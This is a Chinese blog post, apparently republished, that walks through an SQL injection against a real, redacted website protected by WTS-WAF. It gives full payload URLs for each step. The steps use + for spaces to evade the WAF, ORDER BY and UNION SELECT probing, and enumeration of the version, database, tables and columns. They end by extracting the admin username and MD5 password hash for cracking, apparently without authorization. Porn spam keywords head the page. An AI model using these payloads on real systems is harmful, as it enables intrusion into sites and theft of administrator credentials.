国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

實(shí)戰(zhàn)繞過(guò)WTS-WAF的SQL注入

這篇具有很好參考價(jià)值的文章主要介紹了實(shí)戰(zhàn)繞過(guò)WTS-WAF的SQL注入。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問(wèn)。

1.前言

??本人在做完測(cè)試了,所保留的信息均已刪除且未保留,只是友好的測(cè)試,并非有意為之。若侵權(quán)請(qǐng)聯(lián)系我進(jìn)行刪帖。

2.測(cè)試流程

2.1.發(fā)現(xiàn)漏洞

??這里發(fā)現(xiàn)漏洞也是通過(guò)URL來(lái)進(jìn)行判斷的,發(fā)現(xiàn)存在?id=22,那么就激情我的測(cè)試的興趣了,但是and 1=2–+上來(lái)就給我干出了WAF,然后這里就需要考慮如何繞過(guò)WAF了。

2.1.1.正常頁(yè)面

??這里可以看到頁(yè)面是正常的。
實(shí)戰(zhàn)繞過(guò)WTS-WAF的SQL注入

2.1.2.WAF警告

??通過(guò)頁(yè)面發(fā)現(xiàn),被WAF警告了,同時(shí)也顯示了該WAF為WTS,那么就簡(jiǎn)單了上網(wǎng)上找一下,WTS-WAF繞過(guò)方式。但是呢,之前也學(xué)過(guò)就沒(méi)有立即去找相關(guān)的繞過(guò)方式,采用的是+號(hào)代替空格進(jìn)行測(cè)試。
實(shí)戰(zhàn)繞過(guò)WTS-WAF的SQL注入

2.1.3.非正常頁(yè)面

??這里也是很棒,竟然使用+號(hào)代替空格真能繞過(guò),那么就可以繼續(xù)向下測(cè)試了。
實(shí)戰(zhàn)繞過(guò)WTS-WAF的SQL注入

2.2.判斷字段數(shù)

??前面我們通過(guò)+號(hào)替換空格繞過(guò)了,那么下面我們就要接著測(cè)試了。通過(guò)order by來(lái)測(cè)試字段數(shù)。這里截圖為了方便,就直接截圖下面的信息,上面的就不截圖了。

2.2.1.非正常頁(yè)面

??這里我們測(cè)試到order by 22–+的時(shí)候,出現(xiàn)報(bào)錯(cuò)了,那么就可以證明字段數(shù)為21。

URL:http://www.XXXXX.com/XXXX.php?id=22+order+by+22--+

實(shí)戰(zhàn)繞過(guò)WTS-WAF的SQL注入

2.2.2.正常頁(yè)面

??這里我們輸入21的時(shí)候頁(yè)面正常了,只是和正常的頁(yè)面還是有點(diǎn)區(qū)別。

URL:http://www.XXXXX.com/XXXXX.php?id=22+order+by+21--+

實(shí)戰(zhàn)繞過(guò)WTS-WAF的SQL注入

2.3.判斷回顯位

??到這里我們就需要判斷回顯位是哪里了。使用union select繼續(xù)測(cè)試。
??這里通過(guò)測(cè)試回顯位是7,那么就可以利用這個(gè)7來(lái)進(jìn)行下面的測(cè)試。

URL:http://www.XXXX.com/XXXX.php?id=-22+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+

實(shí)戰(zhàn)繞過(guò)WTS-WAF的SQL注入

2.4.信息收集

??這里我們主要收集數(shù)據(jù)庫(kù)名,和數(shù)據(jù)庫(kù)版本,通過(guò)頁(yè)面出現(xiàn)的報(bào)錯(cuò),也能夠了解到,使用的是mysql數(shù)據(jù)庫(kù)。

2.4.1.數(shù)據(jù)庫(kù)版本

??這里我們得到的數(shù)據(jù)庫(kù)版本是:5.7.37。

URL:http://www.XXXX.com/XXXX.php?id=-22+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21--+#

實(shí)戰(zhàn)繞過(guò)WTS-WAF的SQL注入

2.4.2.數(shù)據(jù)庫(kù)名

??這里我們得到的數(shù)據(jù)庫(kù)名是:ahshyydz。

URL:http://www.XXXX.com/XXXX.php?id=-22+union+select+1,2,3,4,5,6,database(),8,9,10,11,12,13,14,15,16,17,18,19,20,21--+#

實(shí)戰(zhàn)繞過(guò)WTS-WAF的SQL注入

2.5.判斷數(shù)據(jù)庫(kù)表

??既然我們獲取到了數(shù)據(jù)庫(kù)名以及版本,那么我們就可以使用mysql大于5.0版本中的特性來(lái)獲取數(shù)據(jù)。

2.5.1.WAF告警

??本以為到這里能夠成功過(guò)去的,結(jié)果又出現(xiàn)告警,后來(lái)通過(guò)查詢(xún)文章以及手動(dòng)測(cè)試發(fā)現(xiàn)是由于group_concat 和括號(hào) () 在一起的時(shí)候才會(huì)觸發(fā)攔截。那么沒(méi)辦法只有一個(gè)一個(gè)測(cè)試了。

URL:http://www.XXXXXXX.com/XXXXX.php?id=-22+union+select+1,2,3,4,5,6,group_concat(table_name),8,9,10,11,12,13,14,15,16,17,18,19,20,21%20from%20information_schema.tables+where+table_schema=%22ahshyydz%22--+

實(shí)戰(zhàn)繞過(guò)WTS-WAF的SQL注入

2.5.2.獲取表

??這里我們就只能使用limit一個(gè)一個(gè)測(cè)試了,這里我們成功獲取到第一個(gè)表,但是向后測(cè)試發(fā)現(xiàn)不止一個(gè)表,為了方便我們使用burp suite進(jìn)行測(cè)試。

URL:http://www.XXXXX.com/XXXX.php?id=-22+union+select+1,2,3,4,5,6,table_name,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+information_schema.tables+where+table_schema=%22ahshyydz%22+limit+0,1--+

實(shí)戰(zhàn)繞過(guò)WTS-WAF的SQL注入

2.5.3.burp suite測(cè)試

??這里我們使用軟件自動(dòng)加數(shù)字來(lái)進(jìn)行爆破。
實(shí)戰(zhàn)繞過(guò)WTS-WAF的SQL注入

2.5.4.表名稱(chēng)

??這里我們通過(guò)測(cè)試得到了很多的表,為了避免信息泄露,這里我就挑選幾個(gè)疑似賬號(hào)密碼的表來(lái)測(cè)試。

表名:admin_authority、admin_login、admininfo

實(shí)戰(zhàn)繞過(guò)WTS-WAF的SQL注入

2.6.判斷數(shù)據(jù)庫(kù)列

??到這里我們就要進(jìn)行數(shù)據(jù)庫(kù)的列進(jìn)行判斷了,之前我們得知使用group_concat會(huì)被檢測(cè),既然這樣,那么我們還是一個(gè)一個(gè)測(cè)試。
??這里依舊使用我們的工具進(jìn)行測(cè)試,這里就不演示過(guò)程了,直接上結(jié)果吧,這里我們獲取到username與passwd表,其它的表我們不管。

URL:http://www.XXXX.com/XXXX.php?id=-22+union+select+1,2,3,4,5,6,column_name,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+information_schema.columns+where+table_name=%22admininfo%22+limit+0,1--+

實(shí)戰(zhàn)繞過(guò)WTS-WAF的SQL注入

2.7.獲取數(shù)據(jù)

??這里我們就獲取到表與列了,那么就可以進(jìn)行數(shù)據(jù)獲取了,而獲取數(shù)據(jù)的辦法同樣是這樣操作。

2.7.1.賬戶(hù)

??這里由于顯示位只有一個(gè)就先測(cè)試賬戶(hù)吧,這里結(jié)果測(cè)試只有一個(gè)admin賬戶(hù)。

URL:http://www.XXXX.com/XXXX.php?id=-22+union+select+1,2,3,4,5,6,username,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from%20admininfo+limit+0,1--+

實(shí)戰(zhàn)繞過(guò)WTS-WAF的SQL注入

2.7.2.密碼

??這里賬戶(hù)就一個(gè),那么密碼應(yīng)該也就是一個(gè),這里我們只測(cè)試一個(gè)吧,并且這個(gè)密碼還是md5加密,這里我們找個(gè)平臺(tái)進(jìn)行解密即可。

URL:http://www.XXX.com/XXXX.php?id=-22+union+select+1,2,3,4,5,6,passwd,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from%20admininfo+limit+0,1--+

實(shí)戰(zhàn)繞過(guò)WTS-WAF的SQL注入

3.總結(jié)

??其實(shí)這個(gè)網(wǎng)站主要的困難就是需要繞WAF,通常想這類(lèi)的WAF在百度搜一搜都會(huì)有相關(guān)的繞過(guò)方式的。文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-477787.html

到了這里,關(guān)于實(shí)戰(zhàn)繞過(guò)WTS-WAF的SQL注入的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來(lái)自互聯(lián)網(wǎng)用戶(hù)投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • WAF繞過(guò)漏洞利用——漏洞利用之注入上傳跨站等繞過(guò)

    目錄 前言: (一)SQL注入 0x01? sqlmap注入 修改user-agent頭: (二)文件上傳

    2024年02月12日
    瀏覽(21)
  • 【第二十三篇】Burpsuite+SQL注入實(shí)現(xiàn)登錄繞過(guò)等(靶場(chǎng)實(shí)戰(zhàn)案例)

    存在一個(gè)業(yè)務(wù)場(chǎng)景如下 篩選商品時(shí),后端查詢(xún)語(yǔ)句如下: 只有商品名匹配且該商品已發(fā)布(released=1),客戶(hù)端才能回顯數(shù)據(jù)。 點(diǎn)擊Lifestyle時(shí),頁(yè)面回顯 生活方式 有關(guān)商品,并可知參數(shù)以GET方

    2024年04月10日
    瀏覽(30)
  • 【W(wǎng)AF剖析】——SQL注入之安全狗bypass深度剖析

    【W(wǎng)AF剖析】——SQL注入之安全狗bypass深度剖析

    作者名:Demo不是emo? 主頁(yè)面鏈接:主頁(yè)傳送門(mén) 創(chuàng)作初心: 舞臺(tái)再大,你不上臺(tái),永遠(yuǎn)是觀眾,沒(méi)人會(huì)關(guān)心你努不努力,摔的痛不痛,他們只會(huì)看你最后站在什么位置,然后羨慕或鄙夷 座右銘: 不要讓時(shí)代的悲哀成為你的悲哀 專(zhuān)研方向: 網(wǎng)絡(luò)安全,數(shù)據(jù)結(jié)構(gòu) 每日emo: 保持

    2024年02月03日
    瀏覽(24)
  • SQL注入繞過(guò)安全狗

    SQL注入繞過(guò)安全狗

    如果程序中設(shè)置了過(guò)濾,但是程序只是對(duì) and ,AND 或者 or,OR 設(shè)置了過(guò)濾,那么你就可以使用大小寫(xiě)過(guò)濾 例如 :and,or 當(dāng)然不局限于 and,其它的例如 union 一些如果只是設(shè)置了過(guò)濾,沒(méi)有進(jìn)行深度過(guò)濾的話,都是可以使用大小寫(xiě)過(guò)濾的 union 設(shè)置了過(guò)濾

    2024年02月15日
    瀏覽(23)
  • SQL注入---字符繞過(guò)

    SQL注入---字符繞過(guò)

    文章目錄 前言 一、pandas是什么? 二、使用步驟 1.引入庫(kù) 2.讀入數(shù)據(jù) 總結(jié) 當(dāng)網(wǎng)頁(yè)源代碼中出現(xiàn)如下代碼后,常見(jiàn)的注釋符號(hào)將無(wú)效,因此需要通過(guò)特殊手段進(jìn)行繞過(guò) 上述代碼中無(wú)法使用符號(hào)(#)或(--+)將后面的sql語(yǔ)句注釋?zhuān)虼诵枰ㄟ^(guò)特殊手段將后面多出的單引號(hào)閉合

    2024年04月11日
    瀏覽(23)
  • 安全狗SQL注入繞過(guò)

    安全狗SQL注入繞過(guò)

    本文用sqli-labs第一關(guān)為例 一、簡(jiǎn)單注入 開(kāi)啟安全狗后嘗試正常注入,發(fā)送請(qǐng)求后可以看到被安全狗攔截了 尋找被安全狗匹配的特征字符,這里沒(méi)被攔截 原來(lái)是當(dāng)and 與 xx=xx 同時(shí)出現(xiàn)的時(shí)候會(huì)被安全狗識(shí)別 1.1 簡(jiǎn)單注入繞過(guò)方式 這里可以使用mysql的內(nèi)聯(lián)注釋來(lái)進(jìn)行繞過(guò) 內(nèi)聯(lián)注

    2024年02月08日
    瀏覽(17)
  • 生命在于學(xué)習(xí)——SQL注入繞過(guò)

    生命在于學(xué)習(xí)——SQL注入繞過(guò)

    SQL注入繞過(guò)技術(shù)已經(jīng)是一個(gè)老生常淡的內(nèi)容了,防注入可以使用某些云waf加速樂(lè)等安全產(chǎn)品,這些產(chǎn)品會(huì)自帶waf屬性攔截和抵御SQL注入,也有一些產(chǎn)品會(huì)在服務(wù)器里安裝軟件,例如iis安全狗、d盾、還有就是在程序理論對(duì)輸入?yún)?shù)進(jìn)行過(guò)濾和攔截,例如360webscan腳本等只要參數(shù)

    2023年04月08日
    瀏覽(16)
  • sql注入(三)繞過(guò)方法及防御手段

    sql注入(三)繞過(guò)方法及防御手段

    常用的注釋符有: 1)-- 注釋內(nèi)容 2)# 注釋內(nèi)容 3)/* 注釋內(nèi)容 */ 繞過(guò)方法 構(gòu)造閉合: 這樣接收源碼前面的引號(hào)被 id=1\\\' 中的后引號(hào)所閉合,源碼中的后引號(hào)會(huì)被 \\\'1\\\'=\\\'1 中的前引號(hào)所閉合所以這樣不用注釋符就逃逸出引號(hào)。 常用于 waf 的正則對(duì)大小寫(xiě)不敏感的情況。 當(dāng)一些關(guān)

    2024年02月02日
    瀏覽(21)
  • Web安全之SQL注入繞過(guò)技巧

    Web安全之SQL注入繞過(guò)技巧

    兩個(gè)空格代替一個(gè)空格,用Tab代替空格,%a0=空格: ??最基本的繞過(guò)方法,用注釋替換空格: 使用浮點(diǎn)數(shù): 如果空格被過(guò)濾,括號(hào)沒(méi)有被過(guò)濾,可以用括號(hào)繞過(guò)。 在MySQL中,括號(hào)是用來(lái)包圍子查詢(xún)的。因此,任何可以計(jì)算出結(jié)果的語(yǔ)句,都可以用括號(hào)包圍起來(lái)。而括號(hào)的兩

    2024年02月07日
    瀏覽(26)
  • iwebsec靶場(chǎng) SQL注入漏洞通關(guān)筆記11-16進(jìn)制編碼繞過(guò)

    iwebsec靶場(chǎng) SQL注入漏洞通關(guān)筆記11-16進(jìn)制編碼繞過(guò)

    iwebsec靶場(chǎng) SQL注入漏洞通關(guān)筆記1- 數(shù)字型注入_mooyuan的博客-CSDN博客 iwebsec靶場(chǎng) SQL注入漏洞通關(guān)筆記2- 字符型注入(寬字節(jié)注入)_mooyuan的博客-CSDN博客 iwebsec靶場(chǎng) SQL注入漏洞通關(guān)筆記3- bool注入(布爾型盲注)_mooyuan的博客-CSDN博客 iwebsec靶場(chǎng) SQL注入漏洞通關(guān)筆記4- sleep注入(時(shí)

    2023年04月24日
    瀏覽(16)

覺(jué)得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包